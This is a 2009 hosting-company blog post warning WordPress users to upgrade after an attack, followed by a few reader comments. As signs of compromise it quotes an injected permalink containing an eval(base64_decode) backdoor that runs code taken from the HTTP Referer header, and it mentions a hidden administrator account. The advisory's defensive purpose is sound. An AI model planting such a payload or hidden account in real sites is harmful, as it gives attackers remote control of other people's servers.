UK Web Hosting

Wordpress Exploit – Upgrade Now!

Posted by: Tim M. // // September 5th, 2009 // WordPress

If you are using Wordpress you must make sure you upgrade it to 2.8.4 *IMMEDIATELY* or remove it from your site entirely.

Last night a number of people on Twitter and blogs mentioned that their Wordpress sites were acting up. Specifically that permalinks were broken and showing up with weird code.

There are two clues that your WordPress site has been attacked:

1) There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” (Check your permalinks in Admin > Settings > Permalinks).

2) A “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account.

Wordpress has identified that there are hackers out there, hacking sites that aren’t using the most-current version of Wordpress (versions below 2.8.4 as of 05/09/2009 — there are rumours that 2.8.5 is due to be released imminently so keep an eye out for that too).

If you have not yet been hacked, UPGRADE NOW! Immediately. Stop reading this, really, and go upgrade. If you don’t know how, ask. Send out a message on Twitter or open a support ticket.

If you have been hacked, sorry, you’re going to be busy! Upgrading alone will not fix a hacked site. Mashable.com’s alert said: “You’ll likely need to export your all your content with the built-in XML WordPress export, uninstall and reinstall WordPress and re-import the content. It’s a nasty attack that goes all the way into the database, so exporting the database will result in exporting the hacked code too.”

Not sure how to do that? It’s not that difficult, but it is very time-consuming. Step by step instructions may be coming soon, so keep checking on our blog and on other sites – www.wordpress.org/support itself and www.mashable.com are always worth checking.

I cannot stress how important it is to get your software installations up-to-date, a number of our customers have reported problems in the last 48 hours, the source of these problems have been to do with out of date Wordpress installs. Remember: If your scripts are out-of-date then your site is insecure and could be hacked at any moment.

Best regards,

Tim @ Evohosting

VN:F [1.8.1_1037]
Rating: 0.0/5 (0 votes cast)

Tags: , , , , , , , , ,

pixelstats trackingpixel
Please help us by sharing this article!
  • Twitter
  • Digg
  • Reddit
  • Google Bookmarks
  • Slashdot
  • StumbleUpon
  • Facebook
  • del.icio.us
  • Sphinn
  • Ping.fm
  • Technorati
  • Posterous
UK Web Hosting

3 Responses to “Wordpress Exploit – Upgrade Now!”

  1. Michele Martel says:
    September 5, 2009 at 8:12 pm

    I agree you should upgrade now the new version is excellent!

    UN:F [1.8.1_1037]
    Rating: 0.0/5 (0 votes cast)
    Reply
  2. Earning Money With Offers says:
    September 7, 2009 at 1:22 pm

    Well it is a good thing I just recently upgraded. I didn’t even know about the exploit. Thanks for the very good information. Hopefully everyone knows about this now.

    UN:F [1.8.1_1037]
    Rating: 0.0/5 (0 votes cast)
    Reply
  3. social bookmarking site says:
    December 27, 2009 at 7:10 pm

    Due to this reason one of my friend’s site was reported for web forgery. We have to upgrade to latest version to solve the problem

    UN:F [1.8.1_1037]
    Rating: 0.0/5 (0 votes cast)
    Reply

Leave a Reply

Copyright (C) 2004 - 2009 - Evohosting Ltd, Company Number: 056146149 (VAT Registration Number: 933-6407-23)
UK Web Hosting | Site Map | Icons | Wordpress Hosting | Joomla Hosting | Magento Hosting | osCommerce Hosting | phpBB Hosting | Drupal Hosting | CubeCart Hosting | PHP-Nuke Hosting | Web Hosting UK